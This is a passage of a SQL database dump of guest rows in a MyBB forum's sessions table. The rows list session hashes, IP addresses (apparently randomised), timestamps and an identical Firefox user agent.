`useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04c816a4997ace8680588e4dd7d093d4', '0', '154.191.37.166', '1352771394', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4ac1d5cd1eeefc32e0936ec3f8ac61a', '0', '138.10.79.83', '1352771395', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e45f378dd6bb253d1b71ea8e87a2363b', '0', '136.148.223.255', '1352771396', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0999c908673f4287b029feeda9e1c281', '0', '253.101.5.190', '1352771397', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14f9c0ec06c3cbad0900d4c63384cdc9', '0', '78.186.101.84', '1352771423', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('744d4428e3faf81035045bfd7d0368d5', '0', '169.26.111.216', '1352771397', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ac9ecde7e07d465a5ef89ca6dec395e8', '0', '157.157.144.43', '1352771398', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('328a1d7c89378cc8ae8842c4e6fb23b5', '0', '47.141.96.196', '1352771401', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb5ccde358e1babb92c37fcfbfefca34', '0', '222.210.23.96', '1352771403', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('086586c55eae74b7b567f0fcad5ba5c9', '0', '17.95.12.47', '1352771404', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b87cc487e3b227e7d4a30ca317548caf', '0', '64.67.215.86', '1352771407', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b6d4758d6da4572b6492f83c4d604cf', '0', '107.40.220.167', '1352771408', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab87ecff935025096a07dd29773192bc', '0', '149.168.44.22', '1352771409', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('95333146b896c2803c4faf89d11072c3', '0', '175.37.116.226', '1352771410', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ce399b0c4031aebdbbce873afb08bed', '0', '119.23.234.170', '1352771412', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7e72e4e6ec3688100db6363501ebfd4b', '0', '46.203.48.75', '1352771413', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('08589ba813448ca666e807f9e640c12b', '0', '219.193.136.202', '1352771414', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e8ab3820a9d15459f94702357797772', '0', '176.29.200.60', '1352771415', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7239c7b1bda8cfc109619a9e78f7d937', '0', '93.151.4.120', '1352771415', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c914bffb20e1e81dc7adeef1f6c2ec63', '0', '140.194.47.216', '1352771416', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('367feefa0f90df936ac51b58229f8d25', '0', '7.82.74.32', '1352771416', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('651621d1c22bf0181b596f1af89ab723', '0', '112.163.204.74', '1352771417', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42e9e3c966f01eb456a335603f0782a6', '0', '38.101.77.181', '1352771418', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ee61d3a026758f8c47525f01aed9001', '0', '145.4.36.93', '1352771419', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('256ee7ed7b5f72a06e9e027efa0b7c4d', '0', '44.76.130.113', '1352771420', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5142ac60af73437ccdfe32c7edfacf3c', '0', '242.79.40.120', '1352771422', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a825d743a9853cfda66969435661bc6', '0', '212.138.60.140', '1352771424', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('738664c522857d7e110703c4eac43f63', '0', '148.147.185.214', '1352771426', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('62f6ae1cff1015225f7eb3f6048c8a05', '0', '11.118.134.171', '1352771431', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3b2d4b434b45cceeef347f07c0194f69', '0', '249.61.239.25', '1352771433', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fc83c36e467b1c8670147119b2fb5c65', '0', '91.74.196.246', '1352771439', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d2f80caa3c46b12a45aadc1ef2b37248', '0', '93.142.233.52', '1352771439', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eee49e6ca560d53ba3f26de5a3052a6d', '0', '41.19.92.187', '1352771440', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('29b648ab32fd58365b8a0ceb5882b737', '0', '233.117.254.76', '1352771443', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('68952ff9cbb8769d4bbaf940ad379164', '0', '185.173.171.143', '1352771445', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7ce5051eb035d1236ebedc4465d73402', '0', '99.87.218.152', '1352771445', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ba5f0f0796f27d5cf9aa5eef91a40b5', '0', '137.112.133.161', '1352771448', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b19c2f579a155c78f1257d630738829c', '0', '52.23.177.112', '1352771451', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4d310f626214ad175c4db59010710208', '0', '167.70.202.61', '1352771451', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48cc54f61549fc66e5190fe50db80e7b', '0', '226.226.61.98', '1352771452', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('256de9c94fb2c1eae2ee90ee6ae54b1b', '0', '54.71.115.73', '1352772164', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d7b79604ed096b76e3b337d83d75427f', '0', '65.49.204.74', '1352771515', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3916d692701647c10765cd4ef77cb63f', '0', '187.21.48.67', '1352771453', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c6716fdaa8fbcdde785f81866db64f16', '0', '41.42.61.160', '1352771453', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9f5fa7228411454ddbd1b1700f7be7f4', '0', '191.92.202.19', '1352771454', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ccaed8576f3486d3c82c913a78738117', '0', '101.221.204.71', '1352771455', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4cd80be67e8700fca8dd12a6126cf93a', '0', '130.36.207.254', '1352771455', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('42956d9f29e80d2178d6042dd94c7999', '0', '11.240.153.223', '1352771456', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('41173fe67c67ec64798fa3dcccd7f7da', '0', '110.80.48.148', '1352771461', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8906ec1ff323b0cf0ed3eb0e4847ce8e', '0', '209.48.105.246', '1352771462', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f49aa709ecabd056f0e8cb76882655a', '0', '61.170.235.203', '1352771463', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46531d7251ce015d926458f22d0bb0bd', '0', '227.29.161.66', '1352771464', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d386d553cccaa96db966aca1d00f3795', '0', '182.139.50.30', '1352771465', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5df17f5f5d6c4c32a11f4266a5e6196a', '0', '33.185.103.252', '1352771470', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3e5062c5b581863256982c4f701f91c4', '0', '98.95.176.237', '1352771472', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eee513afc70c816f6a83b6856ec79d03', '0', '43.161.152.29', '1352771473', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('01d0ebbf6f4a1a3cea5c1ebe0f48ad7c', '0', '161.52.232.221', '1352771475', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8f29b68080b3d7f7550d4a4766c04ffc', '0', '116.103.171.185', '1352771476', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1498a0466f5e5cd61dddf35c1d4417c4', '0', '133.247.62.190', '1352771477', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('82cb1853d293bf7e5b263207783908d6', '0', '166.15.127.190', '1352771477', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffdf6f2f54139cbd8c15e040a81b781c', '0', '96.11.227.58', '1352771478', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69534d802a54084e2ffe82159e0621c0', '0', '4.197.98.128', '1352771478', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ade4c20234d55ed50962d085b027d96', '0', '143.11.37.117', '1352771479', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d2ecb868c0048f5a547e3fd74178cf2', '0', '222.115.156.31', '1352771480', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4951087eb6fd78273196a3681563b09', '0', '141.193.43.184', '1352771483', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b1c5a0ad275e868418b11ccb2101da82', '0', '239.157.39.92', '1352771485', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('46a71f8cdf8259d95007f032956af6f4', '0', '43.84.17.126', '1352771485', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f37e4d9b68d1f200c8e1ad3feed2bf4f', '0', '18.171.117.13', '1352771488', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('69aade7d59228d8238b540e097d82f3b', '0', '226.19.33.189', '1352771491', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8da6c2c822affe6e53c4263d80bd3c1e', '0', '62.126.47.99', '1352771492', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('deee4888cdaf572996cf6d4f7696e7ec', '0', '46.232.209.158', '1352771499', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fd89e806e38ca0d2ae341871a3787c92', '0', '46.207.58.120', '1352771499', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a1cd0e0c1c627fa3efa8b9271964cf0', '0', '201.235.80.28', '1352771500', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f957249112bd91593b750c5ed127ebfc', '0', '116.51.174.181', '1352771501', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9f84552f129534b4efebdf8e2077957c', '0', '208.32.53.163', '1352771503', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d781e667aac2474466abaff73fb550f', '0', '54.228.175.159', '1352771503', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('eccef83bffa1c2736b866a88e84223f9', '0', '160.163.92.104', '1352771504', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1f18c829a6374dd58e0914f62bf29c80', '0', '109.20.194.114', '1352771507', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2562e8fec3c588a1eb4416959865acf7', '0', '146.76.15.81', '1352771508', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f8d01532692a901004beb81d67274aac', 